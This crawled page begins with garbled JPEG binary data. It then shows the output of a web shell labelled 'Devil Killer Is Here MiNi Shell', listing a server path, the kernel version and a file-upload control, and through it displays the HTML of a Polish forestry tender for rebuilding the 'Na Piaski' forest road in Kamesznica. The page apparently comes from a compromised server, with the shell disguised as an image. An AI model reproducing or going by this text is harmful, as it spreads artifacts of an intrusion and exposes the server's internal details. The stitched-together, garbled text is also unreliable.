JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220920/0035584501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa- modernizacja drogi leśnej Na Piaski w leśnictwie Kamesznica </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Węgierska Górka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 071001984</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zielona 62</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Węgierska Górka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-350</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">338641214</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">338641481</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wegierska@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/nadlesnictwo-wegierska-gorka</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa- modernizacja drogi leśnej Na Piaski w leśnictwie Kamesznica </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5a3dc118-38c6-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00355845</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00311920/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa-modernizacja drogi Na Piaski w leśnictwie Kamesznica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.gov.pl/web/nadlesnictwo-wegierska-gorka/przebudowa--modernizacja-drogi-lesnej-na-piaski-w-lesnictwie-kamesznica <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu oraz poczty elektronicznej, z zastrzeżeniem, że złożenie oferty następuje<br/>wyłącznie przy użyciu miniPortalu.<br/>Więcej szczegółów dot. sposobu komunikacji i składania ofert znajduje się Specyfikacji Istotnych Warunków Zamówienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania<br/>z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można<br/>wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej<br/>z zakładki Postępowania.<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami (inna niż oferta Wykonawcy i<br/>załączniki do oferty), w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się<br/>elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia BZP.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, e-mail:<br/>wegierska@katowice.lasy.gov.pl<br/>Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej na e-mail :<br/>wegierska@katowice.lasy.gov.pl<br/>Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w :<br/>- rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r, poz. 2452) oraz<br/>- rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020r, poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016r w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>04.05.2016, str. 1, ze zm.), dalej „RODO”, informuję, że:<br/>- Administratorem Pani/Pana danych osobowych Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Węgierska<br/>Górka; (Kontakt do Inspektora Ochrony Danych: CompNet Sp.z o.o. , ul. Leszczynowa 33A, 62-500 Konin, iod@comp-net.pl.);<br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonego przez Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo<br/>Węgierska Górka w trybie podstawowym pn. „Osadzanie wodospustów drewnianych drążonych na drogach leśnych w leśnictwach<br/>Żabnica, Zielona, Łukaszne.”,<br/>- odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019r – Prawo zamówień publicznych (Dz. U. z 2021r, poz. 1129, ze zm.),<br/>dalej „ustawa Pzp”; dane mogą być udostępniane podmiotom współfinansującym realizację przedmiotu niniejszego postępowania<br/>o udzielenie zamówienia publicznego;<br/>- Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i ust. 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają<br/>z ustawy Pzp;<br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, nie przewiduje się<br/>profilowania danych osobowych, stosowanie do art. 22 RODO;<br/>Więcej szczegółowych informacji nt przetwarzania danych osobowych zawarto w dokumentach zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZG.270.1.6.2022.PG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 739446,39 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lokalizacja inwestycji: Powiat Żywiecki, Gmina: Milówka, Miejscowość: Kamesznica leśnictwo: Kamesznica:<br/><br/>-DROGA LEŚNA STB/220/291 LEŚNICTWO ŻABNICA<br/>Konstrukcja nawierzchni i zakres robót na poszczególnych odcinkach:<br/>Od 0+000 do 2+392<br/>• Przygotowanie kruszywa z wykopów w kruszarce do naprawy dróg<br/>• Wbudowanie i dogęszczenie materiału z kruszarki wraz z wyprofilowaniem korony drogi wraz z rowem<br/>Technologia wykonania nawierzchni: Zerwanie oraz rozbicie istniejącej powierzchni drogi wraz ze skarpą rowu do głębokości 40cm /wraz z podłożem kamienno - skalnym za pomocą kruszarki jezdno wgłębnej. Następnie przemielenie oraz przemieszczenie zerwanego materiału celem uzyskania jednorodnej frakcji kamienno – gruntowej. Rozścielenie przygotowanego materiału wraz z wyprofilowaniem odpowiednich spadków poprzecznych /w tym ukształtowanie odwodnienia/. Dogęszczenie powierzchniowe rozścielonego materiału płytami wibracyjnymi celem osiągnięcia maksymalnej nośności konstrukcji drogi (głębokość penetracji do 55cm). Spadek poprzeczny: daszkowy 2%.<br/><br/>Poprawa odwodnienia<br/>• Wykonanie rowu wraz z niezbędnymi kuciami na całej długości<br/>• Wykonanie czyszczenia istniejących przepustów<br/>• Wykonanie przepustów poprzecznych Ø60cm dł. 12m PEHD wraz ze studnią wlotową i skrzydłami wylotowymi z kamienia na zaprawie w km 0+677<br/>• Wykonanie przepustów poprzecznych Ø60cm dł. 8m PEHD wraz ze studnią wlotową i skrzydłami wylotowymi z kamienia na zaprawie w km 0+932<br/>• Wykonanie przepustów poprzecznych Ø60cm dł. 12m PEHD wraz ze studnią wlotową i skrzydłami wylotowymi z kamienia na zaprawie w km 1+270<br/>• Wykonanie przepustów poprzecznych Ø60cm dł. 8m PEHD wraz ze studnią wlotową i skrzydłami wylotowymi z kamienia na zaprawie w km 1+904<br/>• Wykonanie przepustów poprzecznych Ø60cm dł. 12m PEHD wraz ze studnią wlotową i skrzydłami wylotowymi z kamienia na zaprawie w km 2+083<br/>• Wykonanie przepustów poprzecznych Ø60cm dł. 12m PEHD wraz ze studnią wlotową i skrzydłami wylotowymi z kamienia na zaprawie w km 2+188<br/>• Wykonanie studni wlotowej z kamienia naturalnego na zaprawie do istniejącego przepustu w km 1+570<br/>• Wykonanie brodu na cieku w drodze w km 0+008 z kamienia na betonie 3x12,00m<br/><br/>Kody CPV: <br/>45000000-7 Roboty budowlane<br/>45240000-1 Budowa obiektów inżynierii wodnej<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg<br/>45232000-2 Roboty pomocnicze w zakresie rurociagów i kabli<br/>45262000-1 Specjalne roboty budowlane inne niż dachowe<br/>45112000-5 Roboty w zakresie usuwania gleby<br/>45111200-0 Roboty w zakresie przygotowania terenu pod budowe i roboty ziemne<br/>45233220-7 Roboty w zakresie nawierzchni dróg<br/>45262510-9 Roboty kamieniarskie<br/>45112100-6 Roboty w zakresie kopania rowów<br/>45233120-6 Roboty w zakresie budowy dróg<br/>45232400-6 Roboty budowlane w zakresie kanałów sciekowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45240000-1 - Budowa obiektów inżynierii wodnej</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45262000-1 - Specjalne roboty budowlane inne niż dachowe</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45262510-9 - Roboty kamieniarskie</p> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">280 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie podlegają tylko oferty niepodlegające odrzuceniu.<br/>Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich wagę:<br/>Cena oferty (C) – waga 60 %<br/>Gwarancja i rękojmia za wady na przedmiot zamówienia (G) – waga 40 %<br/>„Okres rękojmi i gwarancji” oznacza, iż okres gwarancji jest równy okresowi rękojmi.)<br/>1) Kryterium: cena oferty (C)<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Dla porównania ofert pod względem kryterium cenowego Zamawiający przyjmuje cenę ofertową brutto podaną w Formularzu<br/>ofertowym.<br/>Maksymalna ilość punktów, która może zostać przyznana Wykonawcy w kryterium cena oferty to<br/>60 punktów.<br/>Oferta wypełniająca w najwyższym stopniu wymagania tego kryterium, otrzyma maksymalną ilość punktów, czyli 60 pkt. Pozostałym<br/>Wykonawcom, spełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza liczba punktów, obliczona wg<br/>poniższego wzoru, zastosowanego do obliczania punktowego:<br/>Cn<br/>------ x 100 x 60% = liczba punktów C<br/>Cx<br/>gdzie: Cn – najniższa zaoferowana cena<br/>Cx – cena zaoferowana w badanej ofercie<br/>liczba 100 – jest to mnożnik zastosowany w celu uzyskania ilości punktów w liczbach<br/>60% – procentowe znaczenie kryterium: ceny oferty (waga 60%).<br/>2) Kryterium: Gwarancja i rękojmia za wady na przedmiot zamówienia (G)<br/>Maksymalna ilość punktów, która może zostać przyznana Wykonawcy w tym kryterium to 40 punktów.<br/>Minimalny wymagany przez Zamawiającego okres gwarancji i rękojmi za wady na przedmiot zamówienia wynosi 36 miesięcy od daty<br/>odbioru końcowego przedmiotu zamówienia. Okres gwarancji i rękojmi należy zadeklarować w pełnych miesiącach, od dnia<br/>podpisania protokołu odbioru końcowego przedmiotu zamówienia. W ramach niniejszego kryterium Zamawiający żąda od<br/>Wykonawcy zrównania okresu gwarancji z okresem rękojmi za wady.<br/>Zamawiający przyzna punktację za powyższe kryterium w następujący sposób:<br/>Gwarancja i rękojmia w miesiącach Liczba punktów<br/>36 – 47 0<br/>48 – 59 20<br/>60 i wyżej 40<br/>Wykonawca w Formularzu ofertowym (załącznik nr 1 do SWZ) określi okres gwarancji i rękojmi za wady na przedmiot zamówienia.<br/>a). Kryterium gwarancji i rękojmi na całość zamówienia będzie rozpatrywane na podstawie zadeklarowanego w formularzu<br/>ofertowym okresu gwarancji.<br/>b). Najdłuższy możliwy okres gwarancji i rękojmi jaki będzie uwzględniany przy ocenie oferty to okres 60 miesięcy.<br/>d). Jeżeli wykonawca wpisze okres gwarancji i rękojmi krótszy niż 36 miesięcy lub nie wypełni w formularzu ofertowym stosownej<br/>rubryki to nie zostaną mu przyznane punkty w tym kryterium.<br/>4) Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów, będącą sumą punktów przyznanych w obu<br/>kryteriach (C+G).<br/>5) Punkty obliczane będą z dokładnością do dwóch miejsc po przecinku.<br/>6) Jeśli nie będzie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przestawiać będzie taki sam bilans<br/>ceny i pozostałych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę, która otrzyma najwyższą ocenę w<br/>kryterium o najwyższej wadze (tj. cena oferty).<br/>Jeżeli oferty otrzymają taka samą ocenę w kryterium „cena oferty”, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do<br/>złożenia w wyznaczonym terminie ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą<br/>oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>5. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą.<br/>1) Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta<br/>otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym terminie, pisemnej zgody na wybór jego oferty.<br/>2) W przypadku braku zgody, o której mowa w ppkt. 1), Zamawiający zwróci się o wyrażenie takiej zgody do kolejnego Wykonawcy,<br/>którego oferta została najwyżej oceniona, chyba że zajdą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia za wady na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu, dotyczące:<br/><br/>1) Zdolności do występowania w obrocie gospodarczym:<br/><br/>Zamawiający nie określa wymagań w zakresie spełnienia tego warunku. <br/><br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający nie określa wymagań w zakresie spełnienia tego warunku. <br/><br/><br/>3) Sytuacji ekonomicznej lub finansowej:<br/><br/>Wykonawca spełni warunek dotyczący sytuacji ekonomicznej 